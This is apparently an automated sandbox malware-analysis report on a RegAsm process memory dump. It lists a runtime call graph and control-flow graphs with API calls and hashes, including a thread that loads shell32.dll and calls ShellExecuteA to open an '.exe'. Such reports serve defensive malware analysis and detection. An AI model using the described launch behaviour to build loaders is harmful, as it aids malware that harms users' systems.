40d7d3 19082->19084 19085 40def7 _Fputc 41 API calls 19083->19085 19154 40d7de 19084->19154 19087 40cba0 19085->19087 19087->19050 19087->19052 19087->19057 19162 40bf1f 19088->19162 19090 40cb48 19090->19057 19092 40ce38 19091->19092 19093 40ce4f 19091->19093 19095 40cfb3 19092->19095 19096 40d024 19092->19096 19097 40ce8e 19092->19097 19094 40def7 _Fputc 41 API calls 19093->19094 19093->19097 19100 40ce83 19094->19100 19101 40d051 19095->19101 19102 40cfb9 19095->19102 19098 40d077 19096->19098 19099 40d029 19096->19099 19097->19057 19098->19101 19109 40cff6 19098->19109 19124 40cfdb 19098->19124 19103 40d06b 19099->19103 19104 40d02b 19099->19104 19100->19057 19191 40c2c9 19101->19191 19102->19109 19113 40cfbf 19102->19113 19208 40d645 19103->19208 19107 40d030 19104->19107 19108 40cfcd 19104->19108 19107->19101 19112 40d035 19107->19112 19123 40cfef 19108->19123 19108->19124 19198 40d385 19108->19198 19109->19123 19172 40c446 19109->19172 19111 40d00b 19111->19123 19179 40d50f 19111->19179 19113->19108 19113->19111 19113->19124 19118 407420 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 19123->19118 19124->19123 19211 41607a 19124->19211 19126 40cfb3 19125->19126 19127 40d024 19125->19127 19130 40cfb9 19126->19130 19133 40d051 19126->19133 19128 40d077 19127->19128 19129 40d029 19127->19129 19128->19133 19139 40cff6 19128->19139 19153 40cfdb 19128->19153 19131 40d06b 19129->19131 19132 40d02b 19129->19132 19138 40cfbf 19130->19138 19130->19139 19137 40d645 42 API calls 19131->19137 19135 40d030 19132->19135 19136 40cfcd 19132->19136 19134 40c2c9 42 API calls 19133->19134 19134->19153 19135->19133 19141 40d035 19135->19141 19140 40d385 44 API calls 19136->19140 19152 40cfef 19136->19152 19136->19153 19137->19153 19138->19136 19142 40d00b 19138->19142 19138->19153 19145 40c446 42 API calls 19139->19145 19139->19152 19140->19153 19143 40d048 19141->19143 19144 40d03a 19141->19144 19148 40d50f 43 API calls 19142->19148 19142->19152 19144->19152 19145->19153 19146 407420 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 19149 40d2d5 19146->19149 19148->19153 19149->19057 19151 41607a _Fputc 43 API calls 19151->19153 19152->19146 19153->19151 19153->19152 19155 40d7f2 19154->19155 19161 40d85c 19154->19161 19156 414bd2 _Ungetc 41 API calls 19155->19156 19157 40d7f9 19156->19157 19158 40e072 __Wcrtomb 14 API calls 19157->19158 19157->19161 19159 40d851 19158->19159 19160 40df74 ___std_exception_copy 41 API calls 19159->19160 19160->19161 19161->19087 19163 40d78b std::_Locinfo::_Locinfo_ctor 41 API calls 19162->19163 19164 40bf31 19163->19164 19165 40bf46 19164->19165 19168 40bf79 19164->19168 19171 40bf61 std::_Locinfo::_Locinfo_ctor 19164->19171 19166 40def7 _Fputc 41 API calls 19165->19166 19166->19171 19167 40c010 19169 40d6cc 41 API calls 19167->19169 19168->19167 19170 40d6cc 41 API calls 19168->19170 19169->19171 19170->19167 19171->19090 19173 40c45a 19172->19173 19192 40c2dd 19191->19192 19209 40c446 42 API calls 19208->19209 19213 41608f 19211->19213 19222 40ed41 19221->19222 19226 40ed68 19221->19226 19222->19226 19226->19066 19230 404002 19228->19230 19298 404700 19230->19298 19231 40405c 19233 404b20 72 API calls 19231->19233 19237 404062 std::ios_base::_Ios_base_dtor 19231->19237 19233->19237 19234 404256 19235 401fff 19234->19235 19313 404a90 19234->19313 19238 404b20 19235->19238 19303 401f00 19237->19303 19421 405474 19238->19421 19241 405474 std::_Lockit::_Lockit 7 API calls 19243 404b6e 19241->19243 19242 404bb1 19427 4054cc 19242->19427 19247 4054cc std::_Lockit::~_Lockit 2 API calls 19243->19247 19245 404bbd 19248 407420 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 19245->19248 19246 404b92 19246->19242 19250 40742e std::_Facet_Register 16 API calls 19246->19250 19247->19246 19249 402020 19248->19249 19281 404890 19249->19281 19251 404c03 19250->19251 19252 405474 std::_Lockit::_Lockit 7 API calls 19251->19252 19253 404c2f 19252->19253 19254 404d98 19253->19254 19255 404c79 19253->19255 19472 40561e 19254->19472 19434 4058aa 19255->19434 19282 404700 43 API calls 19281->19282 19284 4048ce 19282->19284 19283 401f00 std::ios_base::_Init 43 API calls 19284->19283 19300 40471c 19298->19300 19299 404730 19299->19231 19300->19299 19301 404780 43 API calls 19300->19301 19302 40474f 19301->19302 19302->19231 19304 401f1a 19303->19304 19304->19234 19305 408090 CallUnexpected RaiseException 19304->19305 19306 401f32 std::ios_base::_Init 19304->19306 19305->19306 19317 401e50 19306->19317 19314 404af3 19313->19314 19315 404ace 19313->19315 19314->19235 19315->19314 19418 404a00 19315->19418 19318 401e90 19317->19318 19318->19318 19319 404390 std::ios_base::_Init 43 API calls 19318->19319 19320 401ea6 19319->19320 19342 4013b0 19320->19342 19323 401eb7 19343 4013f3 19342->19343 19344 401641 19343->19344 19347 401408 19343->19347 19395 4012d0 19344->19395 19346 401646 19348 40df84 std::ios_base::_Init 41 API calls 19346->19348 19349 401415 _Yarn 19347->19349 19366 404a40 19347->19366 19351 40164b 19348->19351 19352 401490 19349->19352 19380 404560 19349->19380 19353 40df84 std::ios_base::_Init 41 API calls 19351->19353 19358 404560 std::ios_base::_Init 43 API calls 19352->19358 19359 40150a _Yarn 19352->19359 19354 401650 19353->19354 19400 40804e 19354->19400 19358->19359 19359->19346 19360 401580 std::ios_base::_Ios_base_dtor 19359->19360 19361 407feb ___std_exception_copy 42 API calls 19360->19361 19362 4015dc 19361->19362 19362->19351 19363 40160d std::ios_base::_Ios_base_dtor 19362->19363 19364 407420 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 19363->19364 19365 40163b 19364->19365 19365->19323 19367 404a4b 19366->19367 19368 404a6d 19366->19368 19369 404a82 19367->19369 19370 404a52 19367->19370 19371 404a7d 19368->19371 19374 40742e std::_Facet_Register 16 API calls 19368->19374 19404 401250 19369->19404 19373 40742e std::_Facet_Register 16 API calls 19370->19373 19371->19349 19375 404a58 19373->19375 19376 404a77 19374->19376 19377 40df84 std::ios_base::_Init 41 API calls 19375->19377 19378 404a61 19375->19378 19376->19349 19379 404a8c 19377->19379 19378->19349 19381 4046b0 19380->19381 19382 404587 19380->19382 19383 4012d0 std::ios_base::_Init 43 API calls 19381->19383 19386 4045f6 19382->19386 19387 4045e9 19382->19387 19389 4045a0 19382->19389 19384 4046b5 19383->19384 19385 401250 std::ios_base::_Init 43 API calls 19384->19385 19393 4045b0 _Yarn 19385->19393 19391 40742e std::_Facet_Register 16 API calls 19386->19391 19386->19393 19387->19384 19387->19389 19388 40742e std::_Facet_Register 16 API calls 19388->19393 19389->19388 19390 40df84 std::ios_base::_Init 41 API calls 19392 4046bf 19390->19392 19391->19393 19393->19390 19394 404669 std::ios_base::_Ios_base_dtor _Yarn 19393->19394 19394->19352 19410 4055de 19395->19410 19401 408062 19400->19401 19402 40805b 19400->19402 19405 40125b std::_Facet_Register 19404->19405 19406 408090 CallUnexpected RaiseException 19405->19406 19407 40126a 19406->19407 19408 407feb ___std_exception_copy 42 API calls 19407->19408 19409 401291 19408->19409 19409->19375 19415 40551e 19410->19415 19413 408090 CallUnexpected RaiseException 19414 4055fd 19413->19414 19416 401150 std::invalid_argument::invalid_argument 42 API calls 19415->19416 19417 405530 19416->19417 19417->19413 19419 401f00 std::ios_base::_Init 43 API calls 19418->19419 19420 404a1f 19419->19420 19420->19314 19422 405483 19421->19422 19425 40548a 19421->19425 19477 40e125 19422->19477 19424 404b51 19424->19241 19424->19246 19425->19424 19482 406f3c EnterCriticalSection 19425->19482 19428 40e133 19427->19428 19429 4054d6 19427->19429 19532 40e10e LeaveCriticalSection 19428->19532 19431 4054e9 19429->19431 19531 406f4a LeaveCriticalSection 19429->19531 19431->19245 19432 40e13a 19432->19245 19533 40e3e0 19434->19533 19677 405592 19472->19677 19483 414874 19477->19483 19482->19424 19484 4141e3 std::_Lockit::_Lockit 5 API calls 19483->19484 19485 414879 19484->19485 19504 4141fd 19485->19504 19505 4143cc std::_Lockit::_Lockit 5 API calls 19504->19505 19506 414213 19505->19506 19507 414217 19506->19507 19508 4143cc std::_Lockit::_Lockit 5 API calls 19507->19508 19509 41422d 19508->19509 19510 414231 19509->19510 19511 4143cc std::_Lockit::_Lockit 5 API calls 19510->19511 19531->19431 19532->19432 19534 414874 std::_Lockit::_Lockit 5 API calls 19533->19534 19535 40e3ed 19534->19535 19544 40e18b 19535->19544 19545 40e197 __FrameHandler3::FrameUnwindToState 19544->19545 19680 401150 19677->19680 19681 407feb ___std_exception_copy 42 API calls 19680->19681 19682 401188 19681->19682 19683 407420 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 19682->19683 19893 41337b 19892->19893 19894 41338d ___scrt_uninitialize_crt 19892->19894 19895 413389 19893->19895 19897 40edf6 19893->19897 19894->18506 19895->18506 19900 40ec83 19897->19900 19903 40eb77 19900->19903 19904 40eb83 __FrameHandler3::FrameUnwindToState 19903->19904 19911 40e0c6 EnterCriticalSection 19904->19911 19906 40ebf9 19920 40ec17 19906->19920 19907 40eb8d ___scrt_uninitialize_crt 19907->19906 19912 40eaeb 19907->19912 19911->19907 19913 40eaf7 __FrameHandler3::FrameUnwindToState 19912->19913 19923 40bb65 EnterCriticalSection 19913->19923 19915 40eb01 ___scrt_uninitialize_crt 19916 40eb3a 19915->19916 19924 40ed91 19915->19924 19937 40eb6b 19916->19937 19969 40e10e LeaveCriticalSection 19920->19969 19922 40ec05 19922->19895 19923->19915 19925 40eda6 _Fputc 19924->19925 19926 40edb8 19925->19926 19927 40edad 19925->19927 19929 40ed28 ___scrt_uninitialize_crt 66 API calls 19926->19929 19928 40ec83 ___scrt_uninitialize_crt 70 API calls 19927->19928 19930 40edb3 19928->19930 19931 40edc2 19929->19931 19932 40bbd5 _Fputc 41 API calls 19930->19932 19931->19930 19933 414bd2 _Ungetc 41 API calls 19931->19933 19934 40edf0 19932->19934 19935 40edd9 19933->19935 19934->19916 19940 418203 19935->19940 19968 40bb79 LeaveCriticalSection 19937->19968 19939 40eb59 19939->19907 19941 418214 19940->19941 19943 418221 19940->19943 19942 40e072 __Wcrtomb 14 API calls 19941->19942 19950 418219 19942->19950 19944 41826a 19943->19944 19946 418248 19943->19946 19945 40e072 __Wcrtomb 14 API calls 19944->19945 19947 41826f 19945->19947 19951 418161 19946->19951 19949 40df74 ___std_exception_copy 41 API calls 19947->19949 19949->19950 19950->19930 19952 41816d __FrameHandler3::FrameUnwindToState 19951->19952 19964 41c9b3 EnterCriticalSection 19952->19964 19954 41817c 19955 41cc2f __wsopen_s 41 API calls 19954->19955 19963 4181c1 19954->19963 19957 4181a8 FlushFileBuffers 19955->19957 19956 40e072 __Wcrtomb 14 API calls 19958 4181c8 19956->19958 19957->19958 19959 4181b4 GetLastError 19957->19959 19963->19956 19964->19954 19968->19939 19969->19922 22627 40679d 22628 4067ac 22627->22628 22630 4067d0 22628->22630 22631 40f516 22628->22631 22632 40f529 _Fputc 22631->22632 22637 40f44d 22632->22637 22634 40f53e 22635 40bbd5 _Fputc 41 API calls 22634->22635 22636 40f54b 22635->22636 22636->22630 22638 40f482 22637->22638 22639 40f45f 22637->22639 22638->22639 22642 40f4a9 22638->22642 22640 40def7 _Fputc 41 API calls 22639->22640 22641 40f47a 22640->22641 22641->22634 22645 40f352 22642->22645 22646 40f35e __FrameHandler3::FrameUnwindToState 22645->22646 22653 40bb65 EnterCriticalSection 22646->22653 22648 40f36c 22654 40f3ad 22648->22654 22650 40f379 22663 40f3a1 22650->22663 22653->22648 22655 40ed28 ___scrt_uninitialize_crt 66 API calls 22654->22655 22656 40f3c8 22655->22656 22657 4149a0 14 API calls 22656->22657 22658 40f3d2 22657->22658 22659 414094 __dosmaperr 14 API calls 22658->22659 22661 40f3ed 22658->22661 22660 40f411 22659->22660 22662 4140f1 ___free_lconv_mon 14 API calls 22660->22662 22661->22650 22662->22661 22666 40bb79 LeaveCriticalSection 22663->22666 22665 40f38a 22665->22634 22666->22665

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0041FB65: CreateFileW.KERNELBASE(?,00000000,?,0041FF58,?,?,00000000,?,0041FF58,?,0000000C), ref: 0041FB82
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041FFC3
                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 0041FFCA
                                                                                                                                                                                                                                          • GetFileType.KERNELBASE(00000000), ref: 0041FFD6
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041FFE0
                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 0041FFE9
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00420009
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00420156
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00420188
                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 0042018F
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2098178516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4237864984-0
                                                                                                                                                                                                                                          • Opcode ID: 87ef763bbd003f1d2de960a3db6ca709dde3cd444b7d1b6f895e6fd8deb0075d
                                                                                                                                                                                                                                          • Instruction ID: c043dc6610800097a8c7d9f7805d75e01504a092e95ab29a96a2aa982ce353c5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 87ef763bbd003f1d2de960a3db6ca709dde3cd444b7d1b6f895e6fd8deb0075d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FCA14732A041559FCF19DF28EC91BAE3BA1AB46314F18016EF801EB3D2C7398957D759

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 69 4038c0-40398c call 40742e call 40745e LoadLibraryW call 402320 call 401fd0 * 2 81 403990-403995 69->81 81->81 82 403997-4039e0 call 404390 call 403730 call 4042a0 81->82 90 4039e2 82->90 91 4039e4-403abf call 4084c0 82->91 90->91 97 403ac1-403acc 91->97 98 403aec-403af3 91->98 99 403ae2-403ae9 call 40745e 97->99 100 403ace-403adc 97->100 101 403b22-403b3e 98->101 102 403af5-403b02 98->102 99->98 100->99 105 403b40-403b4d 101->105 106 403b6d-403bd4 call 40ba2a call 40dcfa call 40bd99 101->106 103 403b04-403b12 102->103 104 403b18-403b1f call 40745e 102->104 103->104 104->101 109 403b63-403b6a call 40745e 105->109 110 403b4f-403b5d 105->110 121 403bd7-403bdc 106->121 109->106 110->109 121->121 122 403bde-403c24 call 404390 call 403730 call 4042a0 121->122 130 403c26 122->130 131 403c28-403cef call 4084c0 122->131 130->131 137 403cf1-403cfc 131->137 138 403d1c-403d23 131->138 139 403d12-403d19 call 40745e 137->139 140 403cfe-403d0c 137->140 141 403d52-403d6e 138->141 142 403d25-403d32 138->142 139->138 140->139 146 403d70-403d7d 141->146 147 403d9d-403e38 call 40ba2a call 40dcfa call 40bd99 call 402320 ShellExecuteA * 2 141->147 144 403d34-403d42 142->144 145 403d48-403d4f call 40745e 142->145 144->145 145->141 151 403d93-403d9a call 40745e 146->151 152 403d7f-403d8d 146->152 163 403e67-403e8c 147->163 164 403e3a-403e47 147->164 151->147 152->151 165 403eba-403ecd call 407420 163->165 166 403e8e-403e9e 163->166 167 403e49-403e57 164->167 168 403e5d-403e64 call 40745e 164->168 169 403eb0-403eb7 call 40745e 166->169 170 403ea0-403eae 166->170 167->168 168->163 169->165 170->169
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(shell32.dll), ref: 0040390A
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2098178516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                                          • String ID: .exe$@ H$open$shell32.dll
                                                                                                                                                                                                                                          • API String ID: 1029625771-2987591363
                                                                                                                                                                                                                                          • Opcode ID: 7524848f7d8f2674afbb273581c2375fbbf768753a763d1116217cfb9a01ff61
                                                                                                                                                                                                                                          • Instruction ID: 3551e15f6bd169a72ee8878f45c68fafb0690aff99948e81ac1914cb9be179fc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7524848f7d8f2674afbb273581c2375fbbf768753a763d1116217cfb9a01ff61
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BCE12A712083408BD728CF28CC45B6FBBE5BF85305F24462DF489AB2D2D779E6458B5A

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,0041142C,00000016,0040BD98,?,?,50A26BB6,0040BD98,?), ref: 00411443
                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,0041142C,00000016,0040BD98,?,?,50A26BB6,0040BD98,?), ref: 0041144A
                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 0041145C
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2098178516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                                                                                          • Opcode ID: fdc9db31659cbe28c415a8b0888f718e5b65b0592ff8268f2e9698ce38014a47
                                                                                                                                                                                                                                          • Instruction ID: 3fe6f93935658f8ab67006e652a10cd0383134051074610e396dae59c432ecd7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fdc9db31659cbe28c415a8b0888f718e5b65b0592ff8268f2e9698ce38014a47
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5DD09E31100148ABCF117F61EC0DA993F2AAF407557858025FA0A56131CB369993AA58

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 295 416daf-416dce 296 416dd4-416dd6 295->296 297 416fa8 295->297 298 416e02-416e28 296->298 299 416dd8-416df7 call 40def7 296->299 300 416faa-416fae 297->300 302 416e2a-416e2c 298->302 303 416e2e-416e34 298->303 308 416dfa-416dfd 299->308 302->303 304 416e36-416e40 302->304 303->299 303->304 306 416e50-416e5b call 4168fc 304->306 307 416e42-416e4d call 418af3 304->307 313 416e9d-416eaf 306->313 314 416e5d-416e62 306->314 307->306 308->300 315 416eb1-416eb7 313->315 316 416f00-416f20 WriteFile 313->316 317 416e64-416e68 314->317 318 416e87-416e9b call 4164c2 314->318 319 416eb9-416ebc 315->319 320 416eee-416efe call 41697a 315->320 323 416f22-416f28 GetLastError 316->323 324 416f2b 316->324 321 416f70-416f82 317->321 322 416e6e-416e7d call 416894 317->322 334 416e80-416e82 318->334 327 416edc-416eec call 416b3e 319->327 328 416ebe-416ec1 319->328 345 416ed7-416eda 320->345 329 416f84-416f8a 321->329 330 416f8c-416f9e 321->330 322->334 323->324 326 416f2e-416f39 324->326 335 416fa3-416fa6 326->335 336 416f3b-416f40 326->336 327->345 328->321 337 416ec7-416ed2 call 416a55 328->337 329->297 329->330 330->308 334->326 335->300 341 416f42-416f47 336->341 342 416f6e 336->342 337->345 346 416f60-416f69 call 40e03b 341->346 347 416f49-416f5b 341->347 342->321 345->334 346->308 347->308
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 004164C2: GetConsoleOutputCP.KERNEL32(50A26BB6,00000000,00000000,0040BDB8), ref: 00416525
                                                                                                                                                                                                                                          • WriteFile.KERNELBASE(FFBF5BE8,00000000,?,0040BC75,00000000,00000000,00000000,00000000,?,?,0040BC75,?,?,004328B8,00000010,0040BDB8), ref: 00416F18
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,0040BC75,?,?,004328B8,00000010,0040BDB8,?,?,00000000,?), ref: 00416F22
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2098178516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2915228174-0
                                                                                                                                                                                                                                          • Opcode ID: f464ed671a76038d08897ffb1fb948258ea98ac2c0acb72c9529f46f39d22c7a
                                                                                                                                                                                                                                          • Instruction ID: cb585fdb2482b244a4d3bef91fab55670e651a1c55327e645a67e42ff2a15e13
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f464ed671a76038d08897ffb1fb948258ea98ac2c0acb72c9529f46f39d22c7a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4461D775D04249AFDF10CFA8C844AEF7FB9AF09308F16415AF804A7252D379D986CB69

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 350 414d5d-414d71 call 41cc2f 353 414d73-414d75 350->353 354 414d77-414d7f 350->354 355 414dc5-414de5 call 41cb9e 353->355 356 414d81-414d88 354->356 357 414d8a-414d8d 354->357 367 414df7 355->367 368 414de7-414df5 call 40e03b 355->368 356->357 361 414d95-414da9 call 41cc2f * 2 356->361 358 414dab-414dbb call 41cc2f FindCloseChangeNotification 357->358 359 414d8f-414d93 357->359 358->353 371 414dbd-414dc3 GetLastError 358->371 359->358 359->361 361->353 361->358 369 414df9-414dfc 367->369 368->369 371->355
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(00000000,00000000,CF830579,?,00414C44,00000000,CF830579,00432C48,0000000C,00414D00,0040BD0B,?), ref: 00414DB3
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00414C44,00000000,CF830579,00432C48,0000000C,00414D00,0040BD0B,?), ref: 00414DBD
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2098178516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ChangeCloseErrorFindLastNotification
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1687624791-0
                                                                                                                                                                                                                                          • Opcode ID: cf05b64a0bbd980239ba65db1c1c6f103e722fbee84b5f4660c8636332b429dd
                                                                                                                                                                                                                                          • Instruction ID: ceb111eb948f9657ebdeceefd9bfba8073a9b29251fc9eed98a790ab6a2c0bec
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf05b64a0bbd980239ba65db1c1c6f103e722fbee84b5f4660c8636332b429dd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 06114C336041241ADB246635BC867FE6749CBC1738F290A5FF808C72C1DE388CC2929C

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 375 403ee0-403f1d CreateThread WaitForSingleObject call 407420 377 403f22-403f25 375->377
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,004038C0,00000000,00000000,50A26BB6), ref: 00403F06
                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00403F0F
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2098178516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateObjectSingleThreadWait
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1891408510-0
                                                                                                                                                                                                                                          • Opcode ID: af3e1afe4429c917983b20489d93451d494df3de1508f1cbbf6b72916d2180c4
                                                                                                                                                                                                                                          • Instruction ID: 9ada69c4f7ca39928594594d106047c4e65b58e1a3541a0c5f1fc3d2bb6a9bfa
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: af3e1afe4429c917983b20489d93451d494df3de1508f1cbbf6b72916d2180c4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10E08675758300BBD710EF24EC07F1A3BE4BB48B05F914A39F295A62D0D674B404965E

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 406 4143cc-4143f4 407 4143f6-4143f8 406->407 408 4143fa-4143fc 406->408 409 41444b-41444e 407->409 410 414402-414412 call 414301 408->410 411 4143fe-414400 408->411 414 414431-414448 410->414 415 414414-414422 GetProcAddress 410->415 411->409 417 41444a 414->417 415->414 416 414424-41442f call 410bb3 415->416 416->417 417->409
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2098178516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 672b8ef80a1082ffe797a66fe554d50d659c07feffc08aafbed84bfcd02d8428
                                                                                                                                                                                                                                          • Instruction ID: d7b25293e7db54f96000769fea1aeb7630fb582f3d7d0c2fc2c622193e8995c8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 672b8ef80a1082ffe797a66fe554d50d659c07feffc08aafbed84bfcd02d8428
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 620128373002255F9F25CF6EEC40ADB33A6FBC07243148136FA20CB684DA34D8829799

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 420 413ef2-413f18 call 413cc8 423 413f71-413f74 420->423 424 413f1a-413f2c call 41fe8c 420->424 426 413f31-413f36 424->426 426->423 427 413f38-413f70 426->427
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2098178516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __wsopen_s
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3347428461-0
                                                                                                                                                                                                                                          • Opcode ID: 86b5a37895ede01666616fd7f26fe40e68c10059cd8d9e9be6e6956d389c093e
                                                                                                                                                                                                                                          • Instruction ID: be02312cd07e58b193bdeee16c95f5fde802225de20a5ed1c7ae4422ede983e8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 86b5a37895ede01666616fd7f26fe40e68c10059cd8d9e9be6e6956d389c093e
